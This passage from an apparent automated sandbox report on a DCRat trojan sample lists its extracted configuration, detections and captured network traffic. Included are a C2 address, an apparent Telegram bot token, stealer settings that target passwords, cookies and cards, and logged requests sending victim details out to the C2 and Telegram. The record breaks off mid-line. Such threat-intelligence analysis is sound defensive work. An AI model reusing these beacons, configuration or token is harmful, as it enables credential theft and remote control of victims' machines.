Malware Configuration Extractor: DCRat {"SCRT": "{\"6\":\"%\",\"b\":\"&\",\"O\":\")\",\"R\":\"_\",\"J\":\"^\",\"I\":\"-\",\"i\":\".\",\"k\":\"!\",\"2\":\"#\",\"H\":\";\",\"Y\":\"$\",\"m\":\">\",\"N\":\",\",\"1\":\"(\",\"n\":\" \",\"z\":\"|\",\"0\":\"~\",\"S\":\"`\",\"Q\":\"<\",\"T\":\"@\",\"l\":\"*\"}", "PCRT": "{\"c\":\"~\",\"U\":\"#\",\"T\":\")\",\"Q\":\"$\",\"9\":\"*\",\"D\":\"@\",\"Z\":\"(\",\"l\":\" \",\"b\":\",\",\"F\":\"&\",\"p\":\"_\",\"E\":\"<\",\"G\":\"`\",\"C\":\"^\",\"M\":\"%\",\"W\":\";\",\"8\":\"|\",\"x\":\".\",\"m\":\"!\",\"B\":\"-\",\"V\":\">\"}", "TAG": "", "MUTEX": "DCR_MUTEX-dR4mxS0dXrtmqfg1d4zb", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://cm36861.tw1.ru/@=M2MiBTN3ImM", "H2": "http://cm36861.tw1.ru/@=M2MiBTN3ImM", "T": "0"}

Multi AV Scanner detection for dropped file

Source: C:\Recovery\SearchApp.exe	ReversingLabs: Detection: 81%
Source: C:\Recovery\WmiPrvSE.exe	ReversingLabs: Detection: 81%
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	ReversingLabs: Detection: 81%
Source: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe	ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: kQyd2z80gD.exe

ReversingLabs: Detection: 81%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Joe Sandbox ML: detected
Source: C:\Recovery\WmiPrvSE.exe	Joe Sandbox ML: detected
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Joe Sandbox ML: detected
Source: C:\Recovery\SearchApp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: kQyd2z80gD.exe

Joe Sandbox ML: detected

Source: kQyd2z80gD.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2

Source: kQyd2z80gD.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 92.53.106.114:80 -> 192.168.2.5:49743
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49704 -> 92.53.106.114:80
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 92.53.106.114:80 -> 192.168.2.5:49997

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://cm36861.tw1.ru/@=M2MiBTN3ImM

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: kQyd2z80gD.exe, type: SAMPLE
Source: Yara match	File source: 0.0.kQyd2z80gD.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\SearchApp.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED

Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7362674374:AAHc4bvqtak0iH1wK9oJ4m5BCQ5eSxckDy4/sendPhoto?chat_id=https://t.me/vavaaffBOT&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20c81b040e0acd70ade6f5665d2ebc227f233d835d%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20user%0A%E2%80%A2%20PC%20Name%3A%20040965%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20173.254.250.71%0A%E2%80%A2%20GEO%3A%20US%20%2F%20Dallas%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CdLErkomWRcaRguaKAMtYMnt.exe HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf417d74c5912Host: api.telegram.orgContent-Length: 669245Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: TIMEWEB-ASRU TIMEWEB-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?Htuc=04FW5e1D7gwHOLZmIUeH86Hd8X1BJW&6Y=n1I1G72yRqMJwlPc9ZQ&3b482a1504ac77c5c43f7e15a2187b43=9f54798b89eb404995a9b7978336a5b8&c3f24358aa290547facbfb1d35d51e12=gN5QDZjZzMmJGZ0Y2NjFTZihjMxcTYmNTNkRDO4IWZlRGOwE2YyIDO&Htuc=04FW5e1D7gwHOLZmIUeH86Hd8X1BJW&6Y=n1I1G72yRqMJwlPc9ZQ HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&4f95757b0d5ea400a0cf47cfe251d048=0VfiIiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI2IDZ0AzNwYGMklzMkNTMwYmMxcDO5E2Y4UmYmNDZ5gTOlFGN0MTM4IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&c53e3657c2ea67a0f680c4bd0f941e0a=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI2IDZ0AzNwYGMklzMkNTMwYmMxcDO5E2Y4UmYmNDZ5gTOlFGN0MTM4IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: 